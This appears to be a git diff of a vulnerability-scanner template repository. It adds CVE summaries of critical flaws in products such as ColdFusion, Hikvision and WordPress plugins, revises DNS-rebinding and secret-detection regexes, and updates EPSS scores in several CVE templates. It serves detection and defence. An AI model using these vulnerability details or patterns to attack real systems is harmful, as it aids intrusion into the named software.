- Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"} {"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"} @@ -2170,6 +2171,7 @@ {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} +{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"} @@ -2279,14 +2281,17 @@ {"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"} {"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"} {"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"} +{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"} {"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} +{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} {"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"} {"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"} {"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"} +{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"} {"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"} {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} @@ -2298,6 +2303,7 @@ {"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"} {"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"} {"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"} +{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index beda5a2a2c..f16efa320f 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -eb2a2554dd005ef35adf0ff115ae4913 +d1c0809e63305403ca431401cfcebe07 diff --git a/dns/dns-rebinding.yaml b/dns/dns-rebinding.yaml index 0ffb8778b6..5c463ba2f4 100644 --- a/dns/dns-rebinding.yaml +++ b/dns/dns-rebinding.yaml @@ -1,5 +1,4 @@ id: dns-rebinding - info: name: DNS Rebinding Attack author: ricardomaia @@ -10,6 +9,8 @@ info: - https://capec.mitre.org/data/definitions/275.html - https://payatu.com/blog/dns-rebinding/ - https://heimdalsecurity.com/blog/dns-rebinding/ + metadata: + max-request: 2 tags: redirect,dns,network dns: @@ -20,7 +21,7 @@ dns: - type: regex part: answer regex: - - 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$' + - 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$' extractors: - type: regex @@ -28,35 +29,22 @@ dns: name: IPv4 group: 1 regex: - - 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})' + - 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})' - name: "{{FQDN}}" type: AAAA matchers: - # IPv6 Compressed + # IPv6 Compressed and Full - type: regex part: answer regex: - - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$" - - # IPv6 - - type: regex - part: answer - regex: - - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$" + - "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})" extractors: - type: regex part: answer - name: IPv6_Compressed + name: IPv6_ULA group: 1 regex: - - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$" - - - type: regex - part: answer - name: IPv6 - group: 1 - regex: - - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$" -# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})" +# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/keys/linkedin-id.yaml b/file/keys/linkedin-id.yaml index be1cbef9c3..18fde1c52f 100644 --- a/file/keys/linkedin-id.yaml +++ b/file/keys/linkedin-id.yaml @@ -1,4 +1,4 @@ -id: linkedin-client-id +id: linkedin-id info: name: Linkedin Client ID @@ -13,4 +13,4 @@ file: - type: regex regex: - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}" -# digest: 4a0a004730450220331335d5d455d18c7d9c53325bd405f4c3af22856d39f387f303fc93bbea1047022100e773cfaf03d6e40a9c7bed4c68de155acaa563c01f97dab67d1d89641bf8ec4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220331335d5d455d18c7d9c53325bd405f4c3af22856d39f387f303fc93bbea1047022100e773cfaf03d6e40a9c7bed4c68de155acaa563c01f97dab67d1d89641bf8ec4e:922c64590222798bb761d5b6d8e72950 diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index a495c1a753..a6ed7a6ba6 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-25031 cwe-id: CWE-20 epss-score: 0.00265 - epss-percentile: 0.64105 + epss-percentile: 0.65414 cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: shodan-query: http.component:"Swagger" fofa-query: icon_hash="-1180440057" tags: headless,cve,cve2018,swagger,xss,smartbear - headless: - steps: - args: @@ -71,4 +70,4 @@ headless: words: - "swagger" case-insensitive: true -# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 2d3350da55..3285c6d48f 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2014-6271 cwe-id: CWE-78 - epss-score: 0.97564 - epss-percentile: 0.99999 + epss-score: 0.97559 + epss-percentile: 0.99997 cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 93400a28c3..cf44785af5 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.95686 + epss-percentile: 0.96002 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 1c899630fc..2aa77891ff 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 - epss-score: 0.11315 - epss-percentile: 0.94677 + epss-score: 0.11416 + epss-percentile: 0.95073 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index e4dd013391..a49889b5ff 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/jsmol2wp/ - https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-20463 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20463 cwe-id: CWE-22 epss-score: 0.01939 - epss-percentile: 0.87393 + epss-percentile: 0.88289 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 3d1b6e45c8..6fa05cc94d 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24223 cwe-id: CWE-79 - epss-score: 0.00976 - epss-percentile: 0.81758 + epss-score: 0.0069 + epss-percentile: 0.79602 cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index 39d420c0ea..3ed6b9fc39 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -14,13 +14,15 @@ info: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21805 cwe-id: CWE-78 epss-score: 0.97374 - epss-percentile: 0.99892 + epss-percentile: 0.99895 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true @@ -52,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index 65ab692f39..66bb1175d3 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-22873 cwe-id: CWE-601 epss-score: 0.00922 - epss-percentile: 0.81209 + epss-percentile: 0.82474 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true @@ -49,4 +49,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index a396d3d507..9d11f20664 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -6,26 +6,26 @@ info: severity: critical description: | The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections. - remediation: Fixed in 3.4.12 reference: - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24849 - https://wordpress.org/plugins/wc-multivendor-marketplace/ + remediation: Fixed in 3.4.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24849 cwe-id: CWE-89 